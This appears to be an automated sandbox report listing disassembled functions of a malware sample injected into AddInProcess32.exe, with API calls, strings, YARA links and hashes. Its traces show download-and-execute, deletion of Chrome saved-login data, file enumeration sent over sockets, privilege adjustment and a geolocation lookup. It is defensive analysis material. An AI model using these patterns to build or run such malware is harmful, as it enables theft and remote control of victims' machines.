                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                  • String ID: 5.2.0 Pro$override$pth_unenc$RG
                                                                                                  • API String ID: 2281282204-1448307011
                                                                                                  • Opcode ID: 859d382c5514675a88dbfd2b01b2139d6cc1a97d42f31d021ecf9ff28bd1814e
                                                                                                  • Instruction ID: 0454f1d730b8de97e77b6af0221289a353f5645d6d0bcfbcd4472c6607f37e61
                                                                                                  • Opcode Fuzzy Hash: 859d382c5514675a88dbfd2b01b2139d6cc1a97d42f31d021ecf9ff28bd1814e
                                                                                                  • Instruction Fuzzy Hash: 7421E171B0420127D6087676885B6AE399A9B80708F50453FF409672D6FF7C8E0483AF
                                                                                                  Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                                  Strings
                                                                                                  • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                  • String ID: http://geoplugin.net/json.gp
                                                                                                  • API String ID: 3121278467-91888290
                                                                                                  • Opcode ID: 44e3eb189f55cf6f1ed07d44a413c9c9411299a25c39c7d3ec484e6895d2650c
                                                                                                  • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                                  • Opcode Fuzzy Hash: 44e3eb189f55cf6f1ed07d44a413c9c9411299a25c39c7d3ec484e6895d2650c
                                                                                                  • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                                  Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                                  • GetLastError.KERNEL32 ref: 0040BA93
                                                                                                  Strings
                                                                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                                  • UserProfile, xrefs: 0040BA59
                                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                                  • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                  • API String ID: 2018770650-1062637481
                                                                                                  • Opcode ID: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                                                                                  • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                                  • Opcode Fuzzy Hash: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                                                                                  • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                                  Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                  • GetLastError.KERNEL32 ref: 004179D8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                  • API String ID: 3534403312-3733053543
                                                                                                  • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                  • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                                  • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                  • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                                  Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 00409293
                                                                                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                                  • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474F08,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404E38
                                                                                                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404E43
                                                                                                    • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404E4C
                                                                                                  • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B60,00474EF0,00000000), ref: 00404B47
                                                                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B60,00474EF0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                  • String ID:
                                                                                                  • API String ID: 1824512719-0
                                                                                                  • Opcode ID: 3e41b3b17ee7b625e39a35955fea55242fe89250a83e2d42a4dc1e136830e029
                                                                                                  • Instruction ID: 7a56ba3823c44b8d3dadbfeca74e3365e00ee059376cf1b582d15bdd70b30780
                                                                                                  • Opcode Fuzzy Hash: 3e41b3b17ee7b625e39a35955fea55242fe89250a83e2d42a4dc1e136830e029
                                                                                                  • Instruction Fuzzy Hash: 8AB19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                                  Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                  • String ID:
                                                                                                  • API String ID: 276877138-0
                                                                                                  • Opcode ID: ef3c0b856a1de7aadcfa328643844e0c859a8d8812f908c01dc675a5c8606680
                                                                                                  • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                                  • Opcode Fuzzy Hash: ef3c0b856a1de7aadcfa328643844e0c859a8d8812f908c01dc675a5c8606680
                                                                                                  • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                                  Function 00419B86 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$Find$CreateFirstNext
                                                                                                  • String ID: HSG$`XG$`XG
                                                                                                  • API String ID: 341183262-3993355375
                                                                                                  • Opcode ID: eb44e75cba824970a8d6236793f654e4149cf33d528ce4fb0e0c857079cc2993
                                                                                                  • Instruction ID: 3e2b8d556a8fbdbb081ab446324185a4f3aab8361380fbf0113865ad31d0729a
                                                                                                  • Opcode Fuzzy Hash: eb44e75cba824970a8d6236793f654e4149cf33d528ce4fb0e0c857079cc2993
                                                                                                  • Instruction Fuzzy Hash: 588151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                  Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00452555
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0045257E
                                                                                                  • GetACP.KERNEL32 ref: 00452593
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 2299586839-711371036
                                                                                                  • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                  • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                                  • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                  • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                                  Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                                                                  • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                                  • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                                  • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                  • String ID: SETTINGS
                                                                                                  • API String ID: 3473537107-594951305
                                                                                                  • Opcode ID: 7e39093ddf5dcb720cd3caccf1e1277dc2c4d9143844da5a4d70bf483eb1c798
                                                                                                  • Instruction ID: e87eb13c1a863bb520e8110b03cd0e44f0123e9e346c2db4eb51eb31bea7c0b5
                                                                                                  • Opcode Fuzzy Hash: 7e39093ddf5dcb720cd3caccf1e1277dc2c4d9143844da5a4d70bf483eb1c798
                                                                                                  • Instruction Fuzzy Hash: 23E01276600B21EBDB211FB1AC8CD467F25E7C9B533140075FA0582271CB758840DA58
                                                                                                  Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 004096A5
                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 1157919129-0
                                                                                                  • Opcode ID: f7b9eefe839b2bcd70172dbc221549f90cff3adc7a7dcd26f8bce347a4c33931
                                                                                                  • Instruction ID: 095255599cc0af9be2c5710cd9f248f54336688560ad7ccdcde9a73cf5c292f5
                                                                                                  • Opcode Fuzzy Hash: f7b9eefe839b2bcd70172dbc221549f90cff3adc7a7dcd26f8bce347a4c33931
                                                                                                  • Instruction Fuzzy Hash: CB813C729001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                                  Function 00452690 Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 00448301
                                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 0045279C
                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0045286D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 745075371-0
                                                                                                  • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                  • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                                  • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                  • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                                  Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 0040884C
                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                  • String ID:
                                                                                                  • API String ID: 1771804793-0
                                                                                                  • Opcode ID: 23ee2504e33aeb78e6127e011e9d38d7d1f6fb91a84998afc16ba1de22ba214d
                                                                                                  • Instruction ID: 967e03bdddb214c30410211942a515ee3c29859e80101891d5c5db132fd2cd64
                                                                                                  • Opcode Fuzzy Hash: 23ee2504e33aeb78e6127e011e9d38d7d1f6fb91a84998afc16ba1de22ba214d
                                                                                                  • Instruction Fuzzy Hash: 94517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB99
                                                                                                  Function 00446270 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: FSE$FSE
                                                                                                  • API String ID: 0-1826177230
                                                                                                  • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                                                                  • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                                                                                  • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                                                                  • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                                                                                  Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DownloadExecuteFileShell
                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
                                                                                                  • API String ID: 2825088817-2881483049
                                                                                                  • Opcode ID: 826e06f6c5f65a6d9524798ee00512957e571dbc597086c8f6467986236bc486
                                                                                                  • Instruction ID: e12f74d6213dd3660153607da8c9b98f7978e2d251169c1aa1e307be856b925d
                                                                                                  • Opcode Fuzzy Hash: 826e06f6c5f65a6d9524798ee00512957e571dbc597086c8f6467986236bc486
                                                                                                  • Instruction Fuzzy Hash: 1461C471A0830166CA14FB76C8569BE37A59F81758F40093FF9427B2D2EE3C9905C79B
                                                                                                  Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$FirstNextsend
                                                                                                  • String ID: hPG$hPG
                                                                                                  • API String ID: 4113138495-4177492676
                                                                                                  • Opcode ID: 79d3a8a708a64aea57361e3084ac94982208e9b0b63170387c171430dbef8cca
                                                                                                  • Instruction ID: abfa5a3658aec55442980c0effbd4670719d50d4d7308f226e3cac976b3f196c
                                                                                                  • Opcode Fuzzy Hash: 79d3a8a708a64aea57361e3084ac94982208e9b0b63170387c171430dbef8cca
                                                                                                  • Instruction Fuzzy Hash: CB2195315082019BC314FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA09C65B
                                                                                                  Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                    • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                                                                    • Part of subcall function 004137AA: RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EF0,00000000), ref: 004137E1
                                                                                                    • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EF0,00000000,?,00408798,00000001), ref: 004137EC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                  • API String ID: 4127273184-3576401099
                                                                                                  • Opcode ID: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                                                                                  • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                                  • Opcode Fuzzy Hash: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                                                                                  • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                                  Function 0041CA6D Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                    • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                                                                    • Part of subcall function 004137AA: RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EF0,00000000), ref: 004137E1
                                                                                                    • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EF0,00000000,?,00408798,00000001), ref: 004137EC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                  • API String ID: 4127273184-3576401099
                                                                                                  • Opcode ID: 1be57db16bc80fa37d3a9003a2ea5f51ddd37d0b47a9f0501ac93dd6eaa9563f
                                                                                                  • Instruction ID: 1d4fccf664b116fd7e9026c1daa93839c24cbfeedf45b0e65449f5778d70c30d
                                                                                                  • Opcode Fuzzy Hash: 1be57db16bc80fa37d3a9003a2ea5f51ddd37d0b47a9f0501ac93dd6eaa9563f
                                                                                                  • Instruction Fuzzy Hash: DBF0C272BC421022D82931B96DAFBFE18058742F61F15412BF302652CAD4CE6A81428F
                                                                                                  Function 00451D58 Relevance: 6.2, APIs: 4, Instructions: 236COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00451E3A
                                                                                                  • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                                                                  • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00451F7B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 4212172061-0
                                                                                                  • Opcode ID: 715b93ef3f017ee4fea0110e94a068843382a27aff4af5d2daf4b4fdd25eb79d
                                                                                                  • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                                                  • Opcode Fuzzy Hash: 715b93ef3f017ee4fea0110e94a068843382a27aff4af5d2daf4b4fdd25eb79d
